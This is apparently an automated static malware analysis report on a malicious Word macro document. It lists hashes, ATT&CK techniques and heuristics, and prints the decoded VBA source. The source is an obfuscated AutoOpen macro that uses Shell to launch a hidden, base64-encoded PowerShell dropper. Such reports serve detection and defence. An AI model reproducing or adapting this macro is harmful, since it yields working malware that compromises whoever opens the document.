Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e1fe14151f910231…

MALICIOUS

Office (OLE)

Size: 98.0 KB
Created: 2018-05-31 07:19:00
Authoring application: Microsoft Office Word
First seen: 2018-06-21
MD5: 473822f16497e74ae404847bb5429f2e
SHA-1: 7ba537ce98c98ad8f47fadbeabd0a088016053c8
SHA-256: e1fe14151f910231362c3c486117f72e7fdd5022b27edbd2dacc761d8239300a
Risk score: 182

Malware Insights

MITRE ATT&CK
T1059 Command and Scripting Interpreter
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing a VBA macro. The Autoopen macro triggers the NvKmETl function, which uses the Shell() function to execute a command. The script attempts to construct a PowerShell command, indicated by the string concatenation 'powershell -WinDowsTyle hidden -e IAAmACgAIAAoAFsAcwBUAHIASQASQBOAG', suggesting it is designed to download and execute a second-stage payload. The presence of Autoopen and Shell() calls strongly indicates downloader or dropper functionality.

Heuristics 6

  • VBA macros detected (medium; 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 17729 bytes
SHA-256: 944ba33d584d5681aff14fb9c77a4e7ba31846d97b95335348dadb884ce4f7e9
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ZTsvwzjim"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function NvKmETl()
On Error Resume Next
Select Case KAlvMmdlX
      Case 60808
         bwbWF = 73907
         lCIwAF = CDbl(23683)
      Case 94154
         DujPpv = GkXmq
         OidkNf = 98117
End Select
Select Case KAlZwNaKW
      Case 93178
         lniPEa = 83340
         QRfoUl = CDbl(65563)
      Case 444
         KndUQr = zwdwTp
         ZLiwjD = 52173
End Select
NvKmETl = tKazInTdh + Shell(djmBM + Chr(vbKeyP) + CcNwtpYQY + IYEncm + FOvKdSKHji + BzBzhLLXOU + RZhEkd + WZKGFVvu + OZakWpZuiz + qzBjFCNI + cnjbtaJ, WpSbXuQ + vbHide + GUBTtdSlM)
Select Case KAlnnnUw
      Case 99893
         RnPNc = 65
         SIVwCR = CDbl(16551)
      Case 94938
         XamGcq = wwWoAq
         wujnip = 62616
End Select
End Function
Sub Autoopen()
On Error Resume Next
Select Case KAlMiqtW
      Case 55140
         AJNpsQ = 87111
         tibAR = CDbl(31507)
      Case 10634
         hcbZB = idHOR
         HPjTK = 22249
End Select
NvKmETl
Select Case KAlNaKzQC
      Case 69162
         EDpPpH = 36442
         QvDlf = CDbl(58767)
      Case 69679
         iwfCdz = pFUsl
         iKWRi = 50422
End Select
End Sub


Attribute VB_Name = "SzbGoGSYHa"
Function CcNwtpYQY()
On Error Resume Next
Select Case KAlOaJcR
      Case 7422
         clKSob = 20168
         rzQms = CDbl(51600)
      Case 71453
         HEuRn = CKtfs
         VTTRl = 19872
End Select
ziJEzOW = "owersHeLL -WinD" + "owsTyle hidden" + " -e IAAm" + "ACgAIAAoAFsAcw" + "BUAHI" + "ASQBOAGc" + "AXQAkAFYARQB"
Select Case KAluCdna
      Case 64320
         TvWJzw = 56921
         CXXmq = CDbl(18095)
      Case 67277
         ZIiDzX = wBiCqH
         QTkLzG = 77658
End Select
VRRHQOuQDw = "SAEIATwBzAG" + "UAUAByAEU" + "ARgBlA" + "FIAZQBOAEMAR"
Select Case KAlivcGQv
      Case 89952
         TOLDEf = 85181
         bvRXIP = CDbl(88389)
      Case 74656
         ZHDCf = bKpam
         tGiDCP = 77554
End Select
ClYnAifc = "QApAFsAMQ" + "AsADM" + "AXQArACcAWAAnAC" + "0AagBPAEkAbgA" + "nACcAKQAgAC" + "gAKAAoACcANg" + "BmAFcAbgBzAGEA"
Select Case KAlEYlbGk
      Case 7814
         QbTBqw = 83375
         qwoEjs = CDbl(28177)
      Case 8806
         ChojT = zFHDA
         cvuFm = 88924
End Select
Tocvab = "ZABhACcAKw" + "AnAHMAZAAgAD0" + "AIAAmACcAKw" + "AnACgAJwArACcA" + "TgAnA"
Select Case KAlHlkuP
      Case 88285
         FajvL = 19880
         VEDPGw = CDbl(42862)
      Case 36966
         iuqTOA = wwwBzU
         mYpGz = 48533
End Select
qrjciHCdDT = "CsAJwBw" + "AG0AbgBOACcA" + "KwAnA" + "HAAJwArA"
Select Case KAlLsqoH
      Case 83612
         qjzrop = 4485
         YawFj = CDbl(71330)
      Case 98615
         JjBmQ = QqWtaX
         AfGJC = 16120
End Select
HHSYbVYl = "CcAbQAnACs" + "AJwArAE4AJwArA" + "CcAcABtAGUATgBw" + "AG0AKwBOAH" + "AAJwA"
CcNwtpYQY = ziJEzOW + VRRHQOuQDw + ClYnAifc + Tocvab + qrjciHCdDT + HHSYbVYl
End Function
Function IYEncm()
On Error Resume Next
Select Case KAlBJJfP
      Case 74703
         OHuskM = 60513
         EFEbzP = CDbl(13518)
      Case 40098
         OfzYvs = dcjLza
         XdqCi = 53490
End Select
wkkKFwEtjBY = "rACcAb" + "QB3AC0AbwB" + "iAGoAJw" + "ArACcAZQBjA" + "CcAKwAnAE" + "4AcABtACsATgBwA" + "G0AdAAnACsAJ" + "wBOACcAKwAnAHA" + "AJwArACcAbQ"
Select Case KAlpLWTa
      Case 2078
         bIAuo = 29060
         jpbTP = CDbl(97929)
      Case 28276
         dThdj = zINYts
         UaEUq = 82974
End Select
tjVdCAj = "AnACs" + "AJwApAC" + "cAKwA" + "nACAA" + "cgBhAG4AZAAnA" + "CsAJwBvAG0AOwA" + "2AGYAVwB" + "ZACcAKwAnA" + "FkAVQAg" + "AD0AIAAuACgAT"
Select Case KAlTiRKL
      Case 11201
         oPjScm = 64182
         DmwRXi = CDbl(414)
      Case 75390
         vWrPO = wYHMo
         BWSdtJ = 87298
End Select
iHYuiPiNs = "gBw
... (truncated)